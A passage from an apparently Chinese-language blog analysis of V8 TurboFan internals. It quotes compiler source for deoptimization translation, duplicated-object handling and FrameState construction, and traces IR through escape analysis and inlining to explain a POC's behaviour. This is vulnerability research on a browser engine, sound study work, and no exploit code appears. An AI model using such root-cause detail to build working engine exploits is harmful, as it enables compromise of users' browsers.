    <span class="k">for</span> <span class="p">(</span><span class="k">auto</span> <span class="n">field</span> <span class="o">:</span> <span class="o">*</span><span class="n">nested</span><span class="p">)</span> <span class="p">{</span>
      <span class="n">TranslateStateValueDescriptor</span><span class="p">(</span><span class="n">field</span><span class="p">.</span><span class="n">desc</span><span class="p">,</span> <span class="n">field</span><span class="p">.</span><span class="n">nested</span><span class="p">,</span> <span class="n">iter</span><span class="p">);</span>
    <span class="p">}</span>
  <span class="p">}</span> <span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">desc</span><span class="o">-&gt;</span><span class="n">IsArgumentsElements</span><span class="p">())</span> <span class="p">{</span>
    <span class="n">translations_</span><span class="p">.</span><span class="n">ArgumentsElements</span><span class="p">(</span><span class="n">desc</span><span class="o">-&gt;</span><span class="n">arguments_type</span><span class="p">());</span>
  <span class="p">}</span> <span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">desc</span><span class="o">-&gt;</span><span class="n">IsArgumentsLength</span><span class="p">())</span> <span class="p">{</span>
    <span class="n">translations_</span><span class="p">.</span><span class="n">ArgumentsLength</span><span class="p">();</span>
  <span class="p">}</span> <span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">desc</span><span class="o">-&gt;</span><span class="n">IsDuplicate</span><span class="p">())</span> <span class="p">{</span>
    <span class="c1">// 这里写入 kDuplicateObejct</span>
    <span class="n">translations_</span><span class="p">.</span><span class="n">DuplicateObject</span><span class="p">(</span><span class="k">static_cast</span><span class="o">&lt;</span><span class="kt">int</span><span class="o">&gt;</span><span class="p">(</span><span class="n">desc</span><span class="o">-&gt;</span><span class="n">id</span><span class="p">()));</span>
  <span class="p">}</span> <span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">desc</span><span class="o">-&gt;</span><span class="n">IsPlain</span><span class="p">())</span> <span class="p">{</span>
    <span class="n">InstructionOperand</span><span class="o">*</span> <span class="n">op</span> <span class="o">=</span> <span class="n">iter</span><span class="o">-&gt;</span><span class="n">Advance</span><span class="p">();</span>
    <span class="n">AddTranslationForOperand</span><span class="p">(</span><span class="n">iter</span><span class="o">-&gt;</span><span class="n">instruction</span><span class="p">(),</span> <span class="n">op</span><span class="p">,</span> <span class="n">desc</span><span class="o">-&gt;</span><span class="n">type</span><span class="p">());</span>
  <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
    <span class="n">DCHECK</span><span class="p">(</span><span class="n">desc</span><span class="o">-&gt;</span><span class="n">IsOptimizedOut</span><span class="p">());</span>
      <span class="k">if</span> <span class="p">(</span><span class="n">optimized_out_literal_id_</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">optimized_out_literal_id_</span> <span class="o">=</span> <span class="n">DefineDeoptimizationLiteral</span><span class="p">(</span>
            <span class="n">DeoptimizationLiteral</span><span class="p">(</span><span class="n">isolate</span><span class="p">()</span><span class="o">-&gt;</span><span class="n">factory</span><span class="p">()</span><span class="o">-&gt;</span><span class="n">optimized_out</span><span class="p">()));</span>
      <span class="p">}</span>
      <span class="n">translations_</span><span class="p">.</span><span class="n">StoreLiteral</span><span class="p">(</span><span class="n">optimized_out_literal_id_</span><span class="p">);</span>
  <span class="p">}</span>
<span class="p">}</span>

<span class="kt">void</span> <span class="n">TranslationArrayBuilder</span><span class="o">::</span><span class="n">BeginCapturedObject</span><span class="p">(</span><span class="kt">int</span> <span class="n">length</span><span class="p">)</span> <span class="p">{</span>
  <span class="k">auto</span> <span class="n">opcode</span> <span class="o">=</span> <span class="n">TranslationOpcode</span><span class="o">::</span><span class="n">CAPTURED_OBJECT</span><span class="p">;</span>
  <span class="n">Add</span><span class="p">(</span><span class="n">opcode</span><span class="p">);</span>
  <span class="n">Add</span><span class="p">(</span><span class="n">length</span><span class="p">);</span>
  <span class="n">DCHECK_EQ</span><span class="p">(</span><span class="n">TranslationOpcodeOperandCount</span><span class="p">(</span><span class="n">opcode</span><span class="p">),</span> <span class="mi">1</span><span class="p">);</span>
<span class="p">}</span>

<span class="kt">void</span> <span class="n">TranslationArrayBuilder</span><span class="o">::</span><span class="n">DuplicateObject</span><span class="p">(</span><span class="kt">int</span> <span class="n">object_index</span><span class="p">)</span> <span class="p">{</span>
  <span class="k">auto</span> <span class="n">opcode</span> <span class="o">=</span> <span class="n">TranslationOpcode</span><span class="o">::</span><span class="n">DUPLICATED_OBJECT</span><span class="p">;</span>
  <span class="n">Add</span><span class="p">(</span><span class="n">opcode</span><span class="p">);</span>
  <span class="n">Add</span><span class="p">(</span><span class="n">object_index</span><span class="p">);</span>
  <span class="n">DCHECK_EQ</span><span class="p">(</span><span class="n">TranslationOpcodeOperandCount</span><span class="p">(</span><span class="n">opcode</span><span class="p">),</span> <span class="mi">1</span><span class="p">);</span>
<span class="p">}</span>

</code></pre></div></div>

<p>这个函数从 StateValueDescriptor 和 InstructionOperand 中提取处相应的信息，写入到 translateArray 中。而前面着两个源信息是来自于指令选择阶段对 DeoptimizeUnless/DeoptimizeIf/Call 等节点的处理过程中, 这个处理流程会执行到 <code class="language-plaintext highlighter-rouge">InstructionSelector::AppendDeoptimizeArguments</code>, 把与目标关联的 FrameState 节点存储的信息转换成 Descriptor 和 InstructionOperand。</p>

<p>例如处理 Call 节点时，有如下调用栈：</p>

<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">InstructionSelector</span><span class="o">::</span><span class="n">AddOperandToStateValueDescriptor</span><span class="p">(</span><span class="n">v8</span><span class="o">::</span><span class="n">internal</span><span class="o">::</span><span class="n">compiler</span><span class="o">::</span><span class="n">StateValueList</span> <span class="o">*</span><span class="p">)</span>
<span class="n">InstructionSelector</span><span class="o">::</span><span class="n">AddInputsToFrameStateDescriptor</span><span class="p">(</span><span class="n">v8</span><span class="o">::</span><span class="n">internal</span><span class="o">::</span><span class="n">compiler</span><span class="o">::</span><span class="n">StateValueList</span> <span class="o">*</span><span class="p">)</span>
<span class="n">InstructionSelector</span><span class="o">::</span><span class="n">AddInputsToFrameStateDescriptor</span><span class="p">(</span><span class="n">v8</span><span class="o">::</span><span class="n">internal</span><span class="o">::</span><span class="n">compiler</span><span class="o">::</span><span class="n">FrameStateDescriptor</span> <span class="o">*</span><span class="p">)</span>
<span class="n">InstructionSelector</span><span class="o">::</span><span class="n">InitializeCallBuffer</span><span class="p">(</span><span class="n">v8</span><span class="o">::</span><span class="n">internal</span><span class="o">::</span><span class="n">compiler</span><span class="o">::</span><span class="n">Node</span> <span class="o">*</span><span class="p">)</span>
<span class="n">InstructionSelector</span><span class="o">::</span><span class="n">VisitCall</span><span class="p">(</span><span class="n">v8</span><span class="o">::</span><span class="n">internal</span><span class="o">::</span><span class="n">compiler</span><span class="o">::</span><span class="n">Node</span> <span class="o">*</span><span class="p">)</span>
</code></pre></div></div>

<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Returns the number of instruction operands added to inputs.</span>
<span class="kt">size_t</span> <span class="n">InstructionSelector</span><span class="o">::</span><span class="n">AddOperandToStateValueDescriptor</span><span class="p">(</span>
    <span class="n">StateValueList</span><span class="o">*</span> <span class="n">values</span><span class="p">,</span> <span class="n">InstructionOperandVector</span><span class="o">*</span> <span class="n">inputs</span><span class="p">,</span>
    <span class="n">OperandGenerator</span><span class="o">*</span> <span class="n">g</span><span class="p">,</span> <span class="n">StateObjectDeduplicator</span><span class="o">*</span> <span class="n">deduplicator</span><span class="p">,</span> <span class="n">Node</span><span class="o">*</span> <span class="n">input</span><span class="p">,</span>
    <span class="n">MachineType</span> <span class="n">type</span><span class="p">,</span> <span class="n">FrameStateInputKind</span> <span class="n">kind</span><span class="p">,</span> <span class="n">Zone</span><span class="o">*</span> <span class="n">zone</span><span class="p">)</span> <span class="p">{</span>
  <span class="n">DCHECK_NOT_NULL</span><span class="p">(</span><span class="n">input</span><span class="p">);</span>
  <span class="k">switch</span> <span class="p">(</span><span class="n">input</span><span class="o">-&gt;</span><span class="n">opcode</span><span class="p">())</span> <span class="p">{</span>
    <span class="p">...</span>
    <span class="k">case</span> <span class="n">IrOpcode</span><span class="o">::</span><span class="n">kTypedObjectState</span><span class="p">:</span>
    <span class="k">case</span> <span class="n">IrOpcode</span><span class="o">::</span><span class="n">kObjectId</span><span class="p">:</span> <span class="p">{</span>
      <span class="kt">size_t</span> <span class="n">id</span> <span class="o">=</span> <span class="n">deduplicator</span><span class="o">-&gt;</span><span class="n">GetObjectId</span><span class="p">(</span><span class="n">input</span><span class="p">);</span>
      <span class="k">if</span> <span class="p">(</span><span class="n">id</span> <span class="o">==</span> <span class="n">StateObjectDeduplicator</span><span class="o">::</span><span class="n">kNotDuplicated</span><span class="p">)</span> <span class="p">{</span>
        <span class="c1">// 信息从 kTypedObjectState 节点传递到 values(StateDescriptor) 和 input(InstructionOperand)</span>
        <span class="n">DCHECK_EQ</span><span class="p">(</span><span class="n">IrOpcode</span><span class="o">::</span><span class="n">kTypedObjectState</span><span class="p">,</span> <span class="n">input</span><span class="o">-&gt;</span><span class="n">opcode</span><span class="p">());</span>
        <span class="kt">size_t</span> <span class="n">entries</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
        <span class="n">id</span> <span class="o">=</span> <span class="n">deduplicator</span><span class="o">-&gt;</span><span class="n">InsertObject</span><span class="p">(</span><span class="n">input</span><span class="p">);</span>
        <span class="n">StateValueList</span><span class="o">*</span> <span class="n">nested</span> <span class="o">=</span> <span class="n">values</span><span class="o">-&gt;</span><span class="n">PushRecursiveField</span><span class="p">(</span><span class="n">zone</span><span class="p">,</span> <span class="n">id</span><span class="p">);</span>
        <span class="kt">int</span> <span class="k">const</span> <span class="n">input_count</span> <span class="o">=</span> <span class="n">input</span><span class="o">-&gt;</span><span class="n">op</span><span class="p">()</span><span class="o">-&gt;</span><span class="n">ValueInputCount</span><span class="p">();</span>
        <span class="n">ZoneVector</span><span class="o">&lt;</span><span class="n">MachineType</span><span class="o">&gt;</span> <span class="k">const</span><span class="o">*</span> <span class="n">types</span> <span class="o">=</span> <span class="n">MachineTypesOf</span><span class="p">(</span><span class="n">input</span><span class="o">-&gt;</span><span class="n">op</span><span class="p">());</span>
        <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">input_count</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span><span class="p">)</span> <span class="p">{</span>
          <span class="n">entries</span> <span class="o">+=</span> <span class="n">AddOperandToStateValueDescriptor</span><span class="p">(</span>
              <span class="n">nested</span><span class="p">,</span> <span class="n">inputs</span><span class="p">,</span> <span class="n">g</span><span class="p">,</span> <span class="n">deduplicator</span><span class="p">,</span> <span class="n">input</span><span class="o">-&gt;</span><span class="n">InputAt</span><span class="p">(</span><span class="n">i</span><span class="p">),</span> <span class="n">types</span><span class="o">-&gt;</span><span class="n">at</span><span class="p">(</span><span class="n">i</span><span class="p">),</span>
              <span class="n">kind</span><span class="p">,</span> <span class="n">zone</span><span class="p">);</span>
        <span class="p">}</span>
        <span class="k">return</span> <span class="n">entries</span><span class="p">;</span>
      <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
        <span class="c1">// 这里与 kDuplicatedObject 相关</span>
        <span class="c1">// Deoptimizer counts duplicate objects for the running id, so we have</span>
        <span class="c1">// to push the input again.</span>
        <span class="n">deduplicator</span><span class="o">-&gt;</span><span class="n">InsertObject</span><span class="p">(</span><span class="n">input</span><span class="p">);</span>
        <span class="n">values</span><span class="o">-&gt;</span><span class="n">PushDuplicate</span><span class="p">(</span><span class="n">id</span><span class="p">);</span>
        <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
      <span class="p">}</span>
    <span class="p">}</span>
    <span class="p">...</span>
  <span class="p">}</span>
<span class="p">}</span>

<span class="n">StateValueList</span><span class="o">*</span> <span class="n">PushRecursiveField</span><span class="p">(</span><span class="n">Zone</span><span class="o">*</span> <span class="n">zone</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">id</span><span class="p">)</span> <span class="p">{</span>
	<span class="n">fields_</span><span class="p">.</span><span class="n">push_back</span><span class="p">(</span><span class="n">StateValueDescriptor</span><span class="o">::</span><span class="n">Recursive</span><span class="p">(</span><span class="n">id</span><span class="p">));</span>
	<span class="n">StateValueList</span><span class="o">*</span> <span class="n">nested</span> <span class="o">=</span> <span class="n">zone</span><span class="o">-&gt;</span><span class="n">New</span><span class="o">&lt;</span><span class="n">StateValueList</span><span class="o">&gt;</span><span class="p">(</span><span class="n">zone</span><span class="p">);</span>
	<span class="n">nested_</span><span class="p">.</span><span class="n">push_back</span><span class="p">(</span><span class="n">nested</span><span class="p">);</span>
	<span class="k">return</span> <span class="n">nested</span><span class="p">;</span>
<span class="p">}</span>

<span class="k">static</span> <span class="n">StateValueDescriptor</span> <span class="n">Recursive</span><span class="p">(</span><span class="kt">size_t</span> <span class="n">id</span><span class="p">)</span> <span class="p">{</span>
	<span class="n">StateValueDescriptor</span> <span class="n">descr</span><span class="p">(</span><span class="n">StateValueKind</span><span class="o">::</span><span class="n">kNested</span><span class="p">,</span>
							   <span class="n">MachineType</span><span class="o">::</span><span class="n">AnyTagged</span><span class="p">());</span>
	<span class="n">descr</span><span class="p">.</span><span class="n">id_</span> <span class="o">=</span> <span class="n">id</span><span class="p">;</span>
	<span class="k">return</span> <span class="n">descr</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>当 input 节点类型为 <code class="language-plaintext highlighter-rouge">kTypedObjectState</code> 时, 先向 values 中存入的描述符 <code class="language-plaintext highlighter-rouge">kNested</code>, 之后将节点的 input 依次存入 values 和 inputs 中。结合上面的的堆栈恢复代码，可以知道这里会存储对象的 Map, property, elements 等域。</p>

<p>input 来自 FrameState 节点中存储的参数信息</p>

<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">size_t</span> <span class="n">InstructionSelector</span><span class="o">::</span><span class="n">AddInputsToFrameStateDescriptor</span><span class="p">(</span>
    <span class="n">StateValueList</span><span class="o">*</span> <span class="n">values</span><span class="p">,</span> <span class="n">InstructionOperandVector</span><span class="o">*</span> <span class="n">inputs</span><span class="p">,</span>
    <span class="n">OperandGenerator</span><span class="o">*</span> <span class="n">g</span><span class="p">,</span> <span class="n">StateObjectDeduplicator</span><span class="o">*</span> <span class="n">deduplicator</span><span class="p">,</span> <span class="n">Node</span><span class="o">*</span> <span class="n">node</span><span class="p">,</span>
    <span class="n">FrameStateInputKind</span> <span class="n">kind</span><span class="p">,</span> <span class="n">Zone</span><span class="o">*</span> <span class="n">zone</span><span class="p">)</span> <span class="p">{</span>
    <span class="p">...</span>
    <span class="n">StateValuesAccess</span><span class="o">::</span><span class="n">iterator</span> <span class="n">it</span> <span class="o">=</span> <span class="n">StateValuesAccess</span><span class="p">(</span><span class="n">node</span><span class="p">).</span><span class="n">begin</span><span class="p">();</span>
    <span class="c1">// Take advantage of sparse nature of StateValuesAccess to skip over</span>
    <span class="c1">// multiple empty nodes at once pushing repeated OptimizedOuts all in one</span>
    <span class="c1">// go.</span>
    <span class="k">while</span> <span class="p">(</span><span class="o">!</span><span class="n">it</span><span class="p">.</span><span class="n">done</span><span class="p">())</span> <span class="p">{</span>
      <span class="n">values</span><span class="o">-&gt;</span><span class="n">PushOptimizedOut</span><span class="p">(</span><span class="n">it</span><span class="p">.</span><span class="n">AdvanceTillNotEmpty</span><span class="p">());</span>
      <span class="k">if</span> <span class="p">(</span><span class="n">it</span><span class="p">.</span><span class="n">done</span><span class="p">())</span> <span class="k">break</span><span class="p">;</span>
      <span class="n">StateValuesAccess</span><span class="o">::</span><span class="n">TypedNode</span> <span class="n">input_node</span> <span class="o">=</span> <span class="o">*</span><span class="n">it</span><span class="p">;</span>
      <span class="n">entries</span> <span class="o">+=</span> <span class="n">AddOperandToStateValueDescriptor</span><span class="p">(</span><span class="n">values</span><span class="p">,</span> <span class="n">inputs</span><span class="p">,</span> <span class="n">g</span><span class="p">,</span>
                                                  <span class="n">deduplicator</span><span class="p">,</span> <span class="n">input_node</span><span class="p">.</span><span class="n">node</span><span class="p">,</span>
                                                  <span class="n">input_node</span><span class="p">.</span><span class="n">type</span><span class="p">,</span> <span class="n">kind</span><span class="p">,</span> <span class="n">zone</span><span class="p">);</span>
      <span class="o">++</span><span class="n">it</span><span class="p">;</span>
    <span class="p">}</span>
    <span class="p">...</span>
    <span class="k">return</span> <span class="n">entries</span><span class="p">;</span>
  <span class="p">}</span>
<span class="p">}</span>

<span class="c1">// Returns the number of instruction operands added to inputs.</span>
<span class="kt">size_t</span> <span class="n">InstructionSelector</span><span class="o">::</span><span class="n">AddInputsToFrameStateDescriptor</span><span class="p">(</span>
    <span class="n">FrameStateDescriptor</span><span class="o">*</span> <span class="n">descriptor</span><span class="p">,</span> <span class="n">FrameState</span> <span class="n">state</span><span class="p">,</span> <span class="n">OperandGenerator</span><span class="o">*</span> <span class="n">g</span><span class="p">,</span>
    <span class="n">StateObjectDeduplicator</span><span class="o">*</span> <span class="n">deduplicator</span><span class="p">,</span> <span class="n">InstructionOperandVector</span><span class="o">*</span> <span class="n">inputs</span><span class="p">,</span>
    <span class="n">FrameStateInputKind</span> <span class="n">kind</span><span class="p">,</span> <span class="n">Zone</span><span class="o">*</span> <span class="n">zone</span><span class="p">)</span> <span class="p">{</span>
  <span class="p">...</span>
  <span class="n">Node</span><span class="o">*</span> <span class="n">parameters</span> <span class="o">=</span> <span class="n">state</span><span class="p">.</span><span class="n">parameters</span><span class="p">();</span>
  <span class="p">...</span>

  <span class="n">StateValueList</span><span class="o">*</span> <span class="n">values_descriptor</span> <span class="o">=</span> <span class="n">descriptor</span><span class="o">-&gt;</span><span class="n">GetStateValueDescriptors</span><span class="p">();</span>

  <span class="n">DCHECK_EQ</span><span class="p">(</span><span class="n">values_descriptor</span><span class="o">-&gt;</span><span class="n">size</span><span class="p">(),</span> <span class="mi">0u</span><span class="p">);</span>
  <span class="n">values_descriptor</span><span class="o">-&gt;</span><span class="n">ReserveSize</span><span class="p">(</span><span class="n">descriptor</span><span class="o">-&gt;</span><span class="n">GetSize</span><span class="p">());</span>

  <span class="p">...</span>

  <span class="c1">// 处理参数</span>
  <span class="n">entries</span> <span class="o">+=</span> <span class="n">AddInputsToFrameStateDescriptor</span><span class="p">(</span>
      <span class="n">values_descriptor</span><span class="p">,</span> <span class="n">inputs</span><span class="p">,</span> <span class="n">g</span><span class="p">,</span> <span class="n">deduplicator</span><span class="p">,</span> <span class="n">parameters</span><span class="p">,</span> <span class="n">kind</span><span class="p">,</span> <span class="n">zone</span><span class="p">);</span> <span class="c1">// &lt;&lt;&lt;&lt;</span>

  <span class="p">...</span>
<span class="p">}</span>

<span class="kt">void</span> <span class="n">InstructionSelector</span><span class="o">::</span><span class="n">AppendDeoptimizeArguments</span><span class="p">(</span>
    <span class="n">InstructionOperandVector</span><span class="o">*</span> <span class="n">args</span><span class="p">,</span> <span class="n">DeoptimizeKind</span> <span class="n">kind</span><span class="p">,</span>
    <span class="n">DeoptimizeReason</span> <span class="n">reason</span><span class="p">,</span> <span class="n">NodeId</span> <span class="n">node_id</span><span class="p">,</span> <span class="n">FeedbackSource</span> <span class="k">const</span><span class="o">&amp;</span> <span class="n">feedback</span><span class="p">,</span>
    <span class="n">FrameState</span> <span class="n">frame_state</span><span class="p">)</span> <span class="p">{</span>
  <span class="n">OperandGenerator</span> <span class="n">g</span><span class="p">(</span><span class="k">this</span><span class="p">);</span>
  <span class="n">FrameStateDescriptor</span><span class="o">*</span> <span class="k">const</span> <span class="n">descriptor</span> <span class="o">=</span> <span class="n">GetFrameStateDescriptor</span><span class="p">(</span><span class="n">frame_state</span><span class="p">);</span>
  <span class="n">DCHECK_NE</span><span class="p">(</span><span class="n">DeoptimizeKind</span><span class="o">::</span><span class="n">kLazy</span><span class="p">,</span> <span class="n">kind</span><span class="p">);</span>
  <span class="kt">int</span> <span class="k">const</span> <span class="n">state_id</span> <span class="o">=</span> <span class="n">sequence</span><span class="p">()</span><span class="o">-&gt;</span><span class="n">AddDeoptimizationEntry</span><span class="p">(</span>
      <span class="n">descriptor</span><span class="p">,</span> <span class="n">kind</span><span class="p">,</span> <span class="n">reason</span><span class="p">,</span> <span class="n">node_id</span><span class="p">,</span> <span class="n">feedback</span><span class="p">);</span>
  <span class="n">args</span><span class="o">-&gt;</span><span class="n">push_back</span><span class="p">(</span><span class="n">g</span><span class="p">.</span><span class="n">TempImmediate</span><span class="p">(</span><span class="n">state_id</span><span class="p">));</span>
  <span class="n">StateObjectDeduplicator</span> <span class="n">deduplicator</span><span class="p">(</span><span class="n">instruction_zone</span><span class="p">());</span>
  <span class="n">AddInputsToFrameStateDescriptor</span><span class="p">(</span><span class="n">descriptor</span><span class="p">,</span> <span class="n">frame_state</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">g</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">deduplicator</span><span class="p">,</span>
                                  <span class="n">args</span><span class="p">,</span> <span class="n">FrameStateInputKind</span><span class="o">::</span><span class="n">kAny</span><span class="p">,</span>
                                  <span class="n">instruction_zone</span><span class="p">());</span> <span class="c1">// &lt;&lt;&lt;&lt;</span>
<span class="p">}</span>

<span class="c1">// TODO(bmeurer): Get rid of the CallBuffer business and make</span>
<span class="c1">// InstructionSelector::VisitCall platform independent instead.</span>
<span class="kt">void</span> <span class="n">InstructionSelector</span><span class="o">::</span><span class="n">InitializeCallBuffer</span><span class="p">(</span><span class="n">Node</span><span class="o">*</span> <span class="n">call</span><span class="p">,</span> <span class="n">CallBuffer</span><span class="o">*</span> <span class="n">buffer</span><span class="p">,</span>
                                               <span class="n">CallBufferFlags</span> <span class="n">flags</span><span class="p">,</span>
                                               <span class="kt">int</span> <span class="n">stack_param_delta</span><span class="p">)</span> <span class="p">{</span>
  <span class="p">...</span>

  <span class="c1">// If the call needs a frame state, we insert the state information as</span>
  <span class="c1">// follows (n is the number of value inputs to the frame state):</span>
  <span class="c1">// arg 1               : deoptimization id.</span>
  <span class="c1">// arg 2 - arg (n + 2) : value inputs to the frame state.</span>
  <span class="kt">size_t</span> <span class="n">frame_state_entries</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
  <span class="n">USE</span><span class="p">(</span><span class="n">frame_state_entries</span><span class="p">);</span>  <span class="c1">// frame_state_entries is only used for debug.</span>
  <span class="k">if</span> <span class="p">(</span><span class="n">buffer</span><span class="o">-&gt;</span><span class="n">frame_state_descriptor</span> <span class="o">!=</span> <span class="nb">nullptr</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">FrameState</span> <span class="n">frame_state</span><span class="p">{</span>
        <span class="n">call</span><span class="o">-&gt;</span><span class="n">InputAt</span><span class="p">(</span><span class="k">static_cast</span><span class="o">&lt;</span><span class="kt">int</span><span class="o">&gt;</span><span class="p">(</span><span class="n">buffer</span><span class="o">-&gt;</span><span class="n">descriptor</span><span class="o">-&gt;</span><span class="n">InputCount</span><span class="p">()))};</span>

    <span class="p">...</span>
    
    <span class="kt">int</span> <span class="k">const</span> <span class="n">state_id</span> <span class="o">=</span> <span class="n">sequence</span><span class="p">()</span><span class="o">-&gt;</span><span class="n">AddDeoptimizationEntry</span><span class="p">(</span>
        <span class="n">buffer</span><span class="o">-&gt;</span><span class="n">frame_state_descriptor</span><span class="p">,</span> <span class="n">DeoptimizeKind</span><span class="o">::</span><span class="n">kLazy</span><span class="p">,</span>
        <span class="n">DeoptimizeReason</span><span class="o">::</span><span class="n">kUnknown</span><span class="p">,</span> <span class="n">call</span><span class="o">-&gt;</span><span class="n">id</span><span class="p">(),</span> <span class="n">FeedbackSource</span><span class="p">());</span>
    <span class="n">buffer</span><span class="o">-&gt;</span><span class="n">instruction_args</span><span class="p">.</span><span class="n">push_back</span><span class="p">(</span><span class="n">g</span><span class="p">.</span><span class="n">TempImmediate</span><span class="p">(</span><span class="n">state_id</span><span class="p">));</span>

    <span class="n">StateObjectDeduplicator</span> <span class="n">deduplicator</span><span class="p">(</span><span class="n">instruction_zone</span><span class="p">());</span>

    <span class="n">frame_state_entries</span> <span class="o">=</span>
        <span class="mi">1</span> <span class="o">+</span> <span class="n">AddInputsToFrameStateDescriptor</span><span class="p">(</span>
                <span class="n">buffer</span><span class="o">-&gt;</span><span class="n">frame_state_descriptor</span><span class="p">,</span> <span class="n">frame_state</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">g</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">deduplicator</span><span class="p">,</span>
                <span class="o">&amp;</span><span class="n">buffer</span><span class="o">-&gt;</span><span class="n">instruction_args</span><span class="p">,</span> <span class="n">FrameStateInputKind</span><span class="o">::</span><span class="n">kStackSlot</span><span class="p">,</span>
                <span class="n">instruction_zone</span><span class="p">());</span> <span class="c1">// &lt;&lt;&lt;&lt;&lt;</span>

    <span class="n">DCHECK_EQ</span><span class="p">(</span><span class="mi">1</span> <span class="o">+</span> <span class="n">frame_state_entries</span><span class="p">,</span> <span class="n">buffer</span><span class="o">-&gt;</span><span class="n">instruction_args</span><span class="p">.</span><span class="n">size</span><span class="p">());</span>
  <span class="p">}</span>
  <span class="p">...</span>
<span class="p">}</span>


<span class="kt">void</span> <span class="n">InstructionSelector</span><span class="o">::</span><span class="n">VisitCall</span><span class="p">(</span><span class="n">Node</span><span class="o">*</span> <span class="n">node</span><span class="p">,</span> <span class="n">BasicBlock</span><span class="o">*</span> <span class="n">handler</span><span class="p">)</span> <span class="p">{</span>
  <span class="p">...</span>

  <span class="n">CallBuffer</span> <span class="n">buffer</span><span class="p">(</span><span class="n">zone</span><span class="p">(),</span> <span class="n">call_descriptor</span><span class="p">,</span> <span class="n">frame_state_descriptor</span><span class="p">);</span>
  <span class="n">CallDescriptor</span><span class="o">::</span><span class="n">Flags</span> <span class="n">flags</span> <span class="o">=</span> <span class="n">call_descriptor</span><span class="o">-&gt;</span><span class="n">flags</span><span class="p">();</span>

  <span class="c1">// Compute InstructionOperands for inputs and outputs.</span>
  <span class="c1">// TODO(turbofan): on some architectures it's probably better to use</span>
  <span class="c1">// the code object in a register if there are multiple uses of it.</span>
  <span class="c1">// Improve constant pool and the heuristics in the register allocator</span>
  <span class="c1">// for where to emit constants.</span>
  <span class="n">CallBufferFlags</span> <span class="n">call_buffer_flags</span><span class="p">(</span><span class="n">kCallCodeImmediate</span> <span class="o">|</span> <span class="n">kCallAddressImmediate</span><span class="p">);</span>
  <span class="n">InitializeCallBuffer</span><span class="p">(</span><span class="n">node</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">buffer</span><span class="p">,</span> <span class="n">call_buffer_flags</span><span class="p">);</span> <span class="c1">//&lt;&lt;&lt;&lt;</span>

  <span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>

<p>FrameState 节点是 <code class="language-plaintext highlighter-rouge">BytecodeGraphBuilder</code> 在生成 turbofan 图 IR 时创建的，用 <a href="https://v8.github.io/tools/head/turbolizer/index.html">turbolizer</a> 打开 turbofan 输出的 trace 文件，从后往前分析 IR 后发现，<code class="language-plaintext highlighter-rouge">kObjectId</code> 节点对应的是 <code class="language-plaintext highlighter-rouge">b.a.call(arguments,b)</code> 函数调用的 FrameState 中的 receiver 参数</p>

<p><img src="/assets/images/Pasted%20image%2020230811003541.png" alt="Pasted image 20230811003541.png" />
kObjectId 节点是在 EscapeAnalysis 阶段创建的
<img src="/assets/images/Pasted%20image%2020230811003746.png" alt="Pasted image 20230811003746.png" /></p>

<p>再看一下 EscapeAnalysis 之前的 LoadElimination 阶段, 对应的位置是一个 kFinishRegion 节点，浏览相关代码后得知这个节点是 <code class="language-plaintext highlighter-rouge">AllocationBuilder</code> 创建的，是一系列对象创建操作的结尾，结合 POC 源码推测，这里代表的是 arguments 对象的创建。</p>

<p><img src="/assets/images/Pasted%20image%2020230811005830.png" alt="Pasted image 20230811005830.png" /></p>

<p>再往前追溯到 Typer 阶段，发现这里变成了 JSCrateArguments 节点，就刚好可以证实之前的推测。</p>

<p>![[Pasted image 20230814232830.png]]</p>

<p>再往前追溯，下次变化在 BytecodeGraphBuilder 阶段，这个是因为紧随其后的 Inlining 阶段把 JSCall</p>

<p><img src="/assets/images/Pasted%20image%2020230815221029.png" alt="Pasted image 20230815221029.png" /></p>

<p>从 turbofan 的源码视图也可以看出来两个子函数都被 inline 进了最外层的函数</p>

<p><img src="/assets/images/Pasted%20image%2020230815221141.png" alt="Pasted image 20230815221141.png" /></p>

<p>在选定好 inline 的目标后，是在 <code class="language-plaintext highlighter-rouge">JSInliner::ReduceJSCall(Node* node)</code> 函数中完成实际的 inline 操作。主要是创建子函数的 IR 图，之后把它连接到父函数的 IR 图中。连接过程从，有两个操作引起了我的注意：</p>
<ul>
  <li>用调用点 (JSCall节点) 的 FrameState 替换子函数内部的 FrameState 的 outer_frame_state 输入</li>
  <li>用调用点 (JSCall节点) 的实参 (inputs) 替代子函数的 形参 (Parameters) 节点</li>
</ul>

<p>了解了这些再来仔细看下 inline 之后的情况</p>

<p><img src="/assets/images/Pasted%20image%2020230816004600.png" alt="Pasted image 20230816004600.png" /></p>

<p>此时这个 JSCall 对应的已经是 a.b(0, a) 这个函数调用, 所以这个 FrameState 对应的是</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(a) {
    a.b(0, a)
}
</code></pre></div></div>

<p>这个函数的参数是 <code class="language-plaintext highlighter-rouge">b.a.call(arguments, b)</code> 调用传递的，
this =&gt; arguments，所以图中是一个 JSCreateArguments 节点
